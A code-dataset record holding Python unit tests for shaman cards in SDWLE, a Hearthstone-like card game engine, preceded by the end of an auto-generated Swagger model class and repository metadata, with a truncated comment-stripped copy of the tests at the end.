return self._update_date
@update_date.setter
def update_date(self, update_date):
self._update_date = update_date
@property
def vendor_name(self):
return self._vendor_name
@vendor_name.setter
def vendor_name(self, vendor_name):
self._vendor_name = vendor_name
@property
def vendor_request_data(self):
return self._vendor_request_data
@vendor_request_data.setter
def vendor_request_data(self, vendor_request_data):
self._vendor_request_data = vendor_request_data
@property
def vendor_response(self):
return self._vendor_response
@vendor_response.setter
def vendor_response(self, vendor_response):
self._vendor_response = vendor_response
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(KycResponseVo, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, KycResponseVo):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
if not isinstance(other, KycResponseVo):
return True
return self.to_dict() != other.to_dict()
| true
| true
|
1c4208b2f7a2bd869e15e83d2bdd272601022302
| 29,953
|
py
|
Python
|
testsSDW__copy/card_tests/shaman_tests.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
testsSDW__copy/card_tests/shaman_tests.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
testsSDW__copy/card_tests/shaman_tests.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
import random
import unittest
from SDWLE.cards.spells.neutral import TheCoin
from testsSDW.agents.testing_agents import OneCardPlayingAgent, MinionAttackingAgent, CardTestingAgent, \
PlayAndAttackAgent
from testsSDW.testing_utils import generate_game_for
from SDWLE.cards import *
from SDWLE.constants import MINION_TYPE
from SDWLE.agents.basic_agents import PredictableAgent, DoNothingAgent
class TestShaman(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_AlAkirTheWindlord(self):
game = generate_game_for(AlAkirTheWindlord, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 15):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Al'Akir the Windlord", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertTrue(game.players[0].minions[0].charge())
self.assertTrue(game.players[0].minions[0].divine_shield)
self.assertTrue(game.players[0].minions[0].taunt)
def test_DustDevil(self):
game = generate_game_for(DustDevil, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Dust Devil", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertEqual(2, game.players[0].upcoming_overload)
game.play_single_turn()
# Overload should cause us to start this turn with 0 mana
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(0, game.players[0].upcoming_overload)
self.assertEqual(0, game.players[0].mana)
self.assertEqual(2, game.players[0].max_mana)
def test_EarthElemental(self):
game = generate_game_for(EarthElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
# Earth Elemental should be played
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Earth Elemental", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(3, game.players[0].upcoming_overload)
def test_FireElemental(self):
game = generate_game_for(FireElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
# Fire Elemental should be played, and its battlecry should deal three damage to the opponent
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Fire Elemental", game.players[0].minions[0].card.name)
self.assertEqual(27, game.players[1].hero.health)
def test_FlametongueTotem(self):
game = generate_game_for(StonetuskBoar, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
# There should be three Stonetusk Boars on the board
self.assertEqual(3, len(game.players[0].minions))
# add a new Flametongue Totem at index 1
totem = FlametongueTotem()
totem.summon(game.players[0], game, 1)
# The minions to either side should have their attack increased
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# When removing the minion at index 0, we should not get an error
game.players[0].minions[0].die(None)
game.players[0].minions[0].activate_delayed()
self.assertEqual(3, len(game.players[0].minions))
# When removing the minion at index 1, we should have a new minion at index 1,
# and its attack should be increased
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# Silencing this minion should have no effect on its attack
game.players[0].minions[1].silence()
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# We should be able to add a boar on either side of the wolf, and their attack should be increased
# The attack of the boar which used to be next to the wolf should decrease
boar = StonetuskBoar()
boar.summon(game.players[0], game, 0)
boar.summon(game.players[0], game, 2)
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# Add a new boar on the left of the totem since we haven't tested that yet
boar.summon(game.players[0], game, 1)
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
# If the totem is silenced, then the boars to either side should no longer have increased attack
game.players[0].minions[1].silence()
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
def test_ManaTideTotem(self):
game = generate_game_for([ManaTideTotem, WarGolem], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(25, game.players[0].deck.left)
self.assertEqual(0, len(game.players[0].minions))
# Mana Tide Totem should be played, and we should draw a card at the end of turn
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Mana Tide Totem", game.players[0].minions[0].card.name)
self.assertEqual(23, game.players[0].deck.left)
game.play_single_turn()
# After silencing the totem, we should only draw one card next turn
game.players[0].minions[0].silence()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(22, game.players[0].deck.left)
def test_UnboundElemental(self):
game = generate_game_for([UnboundElemental, DustDevil, DustDevil], StonetuskBoar, OneCardPlayingAgent,
DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Unbound Elemental", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(4, game.players[0].minions[0].calculate_max_health())
# One Dust Devil should be played, giving the Unbound Elemental +1/+1
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[-1].calculate_attack())
self.assertEqual(5, game.players[0].minions[-1].calculate_max_health())
# Test the silence
game.players[0].minions[-1].silence()
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
# Another Dust Devil is played; nothing should happen because of the silence
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
def test_Windspeaker(self):
game = generate_game_for([StonetuskBoar, Windspeaker], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
self.assertFalse(game.players[0].minions[0].windfury())
# Windspeaker should be played, giving the boar windfury
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Windspeaker", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[1].windfury())
def test_AncestralHealing(self):
game = generate_game_for([FlametongueTotem, AncestralHealing], StonetuskBoar,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Flametongue Totem", game.players[0].minions[0].card.name)
self.assertEqual(3, game.players[0].minions[0].health)
self.assertFalse(game.players[0].minions[0].taunt)
game.players[0].minions[0].health = 1
game.play_single_turn()
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
def test_AncestralSpirit(self):
game = generate_game_for([ArgentCommander, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
game.play_single_turn()
# Ancestral Spirit should be played on the Argent Commander
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
game.players[0].minions[0].health = 1
game.players[0].minions[0].divine_shield = False
# Let the minion die in order to test Ancestral Spirit
commander = game.players[0].minions[0]
commander.die(None)
commander.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
def test_AncestralSpiritDeathrattle(self):
game = generate_game_for([LootHoarder, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
loot = game.players[0].minions[0]
loot.die(None)
loot.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, len(game.players[0].hand))
def test_Bloodlust(self):
game = generate_game_for([StonetuskBoar, StonetuskBoar, StonetuskBoar, StonetuskBoar, Bloodlust], StonetuskBoar,
MinionAttackingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(20, game.players[1].hero.health)
# Bloodlust should be played, resulting in 4 * 4 = 16 damage
game.play_single_turn()
self.assertEqual(4, game.players[1].hero.health)
# Attack power should be back to normal
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
def test_EarthShock(self):
game = generate_game_for(EarthShock, ArgentSquire, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertTrue(game.players[1].minions[0].divine_shield)
# Earth Shock should be played, silencing away the divine shield and then dealing 1 damage
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
def test_FarSight(self):
game = generate_game_for(FarSight, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
# Far Sight should have been played, so our latest card should cost 3 - 3 = 0
self.assertEqual(0, game.players[0].hand[-1].mana_cost())
self.assertEqual(3, game.players[0].hand[0].mana_cost())
# Draw a card to make sure the new card doesn't get the effect
game.players[0].draw()
self.assertEqual(3, game.players[0].hand[-1].mana_cost())
# Our old card shouldn't have been affected
self.assertEqual(0, game.players[0].hand[-2].mana_cost())
def test_FeralSpirit(self):
game = generate_game_for(FeralSpirit, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].card.mana)
self.assertEqual(2, game.players[0].minions[1].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].health)
self.assertTrue(game.players[0].minions[1].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[1].card.name)
self.assertEqual(2, game.players[0].minions[1].card.mana)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_VitalityTotem(self):
game = generate_game_for(VitalityTotem, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
game.players[0].hero.health = 20
game.play_single_turn()
game.play_single_turn()
self.assertEqual(24, game.players[0].hero.health)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
# The player now has two Vitality Totems in play
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(2, len(game.players[0].minions))
def test_ForkedLightning(self):
game = generate_game_for(ForkedLightning, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 4):
game.play_single_turn()
# Nothing should have happened yet, since the opponent hasn't had 2 minions until now
self.assertEqual(2, len(game.players[1].minions))
# Forked Lightning should be played
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(2, game.players[0].upcoming_overload)
def test_FrostShock(self):
game = generate_game_for(FrostShock, StonetuskBoar, CardTestingAgent, DoNothingAgent)
# Frost Shock should be played
game.play_single_turn()
self.assertEqual(29, game.players[1].hero.health)
self.assertTrue(game.players[1].hero.frozen)
def test_Hex(self):
game = generate_game_for(ChillwindYeti, Hex, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].taunt)
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(5, game.players[0].minions[0].health)
self.assertEqual("Chillwind Yeti", game.players[0].minions[0].card.name)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual("Frog", game.players[0].minions[0].card.name)
self.assertEqual(MINION_TYPE.BEAST, game.players[0].minions[0].card.minion_type)
def test_LavaBurst(self):
game = generate_game_for(LavaBurst, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_LightningBolt(self):
game = generate_game_for(LightningBolt, StonetuskBoar, CardTestingAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_LightningStorm(self):
game = generate_game_for(LightningStorm, Shieldbearer, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
# Lightning Storm should be played
game.play_single_turn()
self.assertEqual(3, len(game.players[1].minions))
self.assertEqual(1, game.players[1].minions[0].health)
self.assertEqual(2, game.players[1].minions[1].health)
self.assertEqual(2, game.players[1].minions[2].health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_RockbiterWeapon(self):
game = generate_game_for(RockbiterWeapon, Shieldbearer, PlayAndAttackAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
# Rockbiter Weapon should be played and used
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
def test_RockbiterWeapon_and_Hex(self):
game = generate_game_for([IronfurGrizzly, RockbiterWeapon, Hex], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Frog", game.current_player.minions[0].card.name)
def test_RockbiterWeapon_and_BaronGeddon(self):
game = generate_game_for([BaronGeddon, RecklessRocketeer, RockbiterWeapon], StonetuskBoar,
PlayAndAttackAgent, DoNothingAgent)
for turn in range(15):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Baron Geddon", game.current_player.minions[0].card.name)
self.assertEqual(11, game.other_player.hero.health)
def test_TotemicMight(self):
game = generate_game_for([TotemicMight, StonetuskBoar], Shieldbearer, PredictableAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
# Hero power and Totemic Might should be played
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_max_health())
self.assertEqual("Stoneclaw Totem", game.players[0].minions[1].card.name)
self.assertEqual(4, game.players[0].minions[1].calculate_max_health())
def test_Windfury(self):
game = generate_game_for(Windfury, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertFalse(game.players[1].minions[0].windfury())
# Windfury should be played
game.play_single_turn()
self.assertTrue(game.players[1].minions[0].windfury())
def test_Doomhammer(self):
game = generate_game_for(Doomhammer, StonetuskBoar, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
self.assertFalse(game.players[0].hero.windfury())
# Doomhammer should be played
game.play_single_turn()
self.assertTrue(game.players[0].hero.windfury())
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(6, game.players[0].weapon.durability)
self.assertEqual(2, game.players[0].upcoming_overload)
self.assertEqual(26, game.players[1].hero.health)
def test_StormforgedAxe(self):
game = generate_game_for(StormforgedAxe, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(3, game.players[0].weapon.durability)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_Crackle(self):
game = generate_game_for(Crackle, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_SiltfinSpiritwalker(self):
game = generate_game_for([MurlocTidecaller, MurlocTidehunter, SiltfinSpiritwalker, Deathwing],
[MurlocTidecaller, Hellfire, BaneOfDoom], OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
# Play Siltfin
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(4, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
# Hellfire will kill all the murlocs but the siltfin.
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(7, len(game.other_player.hand))
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(7, len(game.current_player.hand))
def test_WhirlingZapOMatic(self):
game = generate_game_for(WhirlingZapomatic, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Whirling Zap-o-matic", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
def test_DunemaulShaman(self):
game = generate_game_for(DunemaulShaman,
[StonetuskBoar, GoldshireFootman, SilverbackPatriarch, MogushanWarden],
PlayAndAttackAgent, OneCardPlayingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
game.play_single_turn()
# The shaman's forgetful ability triggers once. It hits the warden one time (its intended target)
# and the footman one time (after triggering forgetful)
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual("Mogu'shan Warden", game.other_player.minions[0].card.name)
self.assertEqual("Silverback Patriarch", game.other_player.minions[1].card.name)
self.assertEqual("Stonetusk Boar", game.other_player.minions[2].card.name)
self.assertEqual(30, game.other_player.hero.health)
def test_Powermace(self):
game = generate_game_for([Powermace, SpiderTank, SpiderTank], Wisp, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(3, game.players[0].weapon.base_attack)
self.assertEqual(1, game.players[0].weapon.durability)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(24, game.players[1].hero.health)
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_Neptulon(self):
game = generate_game_for([TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin,
Neptulon], Wisp, CardTestingAgent, DoNothingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(0, len(game.players[0].hand))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
for card in game.players[0].hand:
self.assertEqual(MINION_TYPE.MURLOC, card.minion_type)
def test_AncestorsCall(self):
game = generate_game_for([AncestorsCall, StonetuskBoar], [Doomguard, Soulfire],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Stonetusk Boar", game.current_player.minions[0].card.name)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual("Doomguard", game.other_player.minions[0].card.name)
self.assertEqual(5, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
def test_LavaShock(self):
game = generate_game_for([Doomhammer, LightningBolt, LavaShock], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(11):
game.play_single_turn()
# The player should have been able to do everything AND have three mana left over
self.assertEqual(25, game.other_player.hero.health)
self.assertEqual(3, game.current_player.mana)
def test_FireguardDestroyer(self):
game = generate_game_for(FireguardDestroyer, Wisp, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(6, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(7, len(game.players[0].minions)) # Well, I was trying to get a 7/6 but no luck
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_AncestralKnowledge(self):
game = generate_game_for(AncestralKnowledge, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(6, len(game.current_player.hand))
self.assertEqual(2, game.current_player.upcoming_overload)
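# --- Illustrative sketch (editor's addition, not part of the original test suite) ---
# Every test above follows the same scaffolding: seed the RNG for determinism, build a
# game with generate_game_for(player_one_cards, player_two_cards, agent_one, agent_two),
# advance it with play_single_turn(), then assert on the resulting board state. A
# hypothetical extra test using that pattern might look like this; the expected boar
# count mirrors the one-boar-per-friendly-turn behaviour asserted in
# test_FlametongueTotem above.
class TestShamanScaffoldingExample(unittest.TestCase):
    def setUp(self):
        random.seed(1857)

    def test_scaffolding_pattern(self):
        game = generate_game_for(StonetuskBoar, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
        for turn in range(0, 3):
            game.play_single_turn()
        # Player one has taken turns 1 and 3, playing one boar on each of them
        self.assertEqual(2, len(game.players[0].minions))
        self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)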
| 43.097842
| 120
| 0.672988
|
import random
import unittest
from SDWLE.cards.spells.neutral import TheCoin
from testsSDW.agents.testing_agents import OneCardPlayingAgent, MinionAttackingAgent, CardTestingAgent, \
PlayAndAttackAgent
from testsSDW.testing_utils import generate_game_for
from SDWLE.cards import *
from SDWLE.constants import MINION_TYPE
from SDWLE.agents.basic_agents import PredictableAgent, DoNothingAgent
class TestShaman(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_AlAkirTheWindlord(self):
game = generate_game_for(AlAkirTheWindlord, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 15):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Al'Akir the Windlord", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertTrue(game.players[0].minions[0].charge())
self.assertTrue(game.players[0].minions[0].divine_shield)
self.assertTrue(game.players[0].minions[0].taunt)
def test_DustDevil(self):
game = generate_game_for(DustDevil, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Dust Devil", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertEqual(2, game.players[0].upcoming_overload)
game.play_single_turn()
# Overload should cause us to start this turn with 0 mana
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(0, game.players[0].upcoming_overload)
self.assertEqual(0, game.players[0].mana)
self.assertEqual(2, game.players[0].max_mana)
def test_EarthElemental(self):
game = generate_game_for(EarthElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
# Earth Elemental should be played
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Earth Elemental", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(3, game.players[0].upcoming_overload)
def test_FireElemental(self):
game = generate_game_for(FireElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
# Fire Elemental should be played, and its battlecry should deal three damage to the opponent
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Fire Elemental", game.players[0].minions[0].card.name)
self.assertEqual(27, game.players[1].hero.health)
def test_FlametongueTotem(self):
game = generate_game_for(StonetuskBoar, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
# There should be three Stonetusk Boars on the board
self.assertEqual(3, len(game.players[0].minions))
# add a new Flametongue Totem at index 1
totem = FlametongueTotem()
totem.summon(game.players[0], game, 1)
# The minions to either side should have their attack increased
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# When removing the minion at index 0, we should not get an error
game.players[0].minions[0].die(None)
game.players[0].minions[0].activate_delayed()
self.assertEqual(3, len(game.players[0].minions))
# When removing the minion at index 1, we should have a new minion at index 1,
# and its attack should be increased
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# Silencing this minion should have no effect on its attack
game.players[0].minions[1].silence()
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# We should be able to add a boar on either side of the wolf, and their attack should be increased
# The attack of the boar which used to be next to the wolf should decrease
boar = StonetuskBoar()
boar.summon(game.players[0], game, 0)
boar.summon(game.players[0], game, 2)
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# Add a new boar on the left of the totem since we haven't tested that yet
boar.summon(game.players[0], game, 1)
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
game.players[0].minions[1].silence()
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
def test_ManaTideTotem(self):
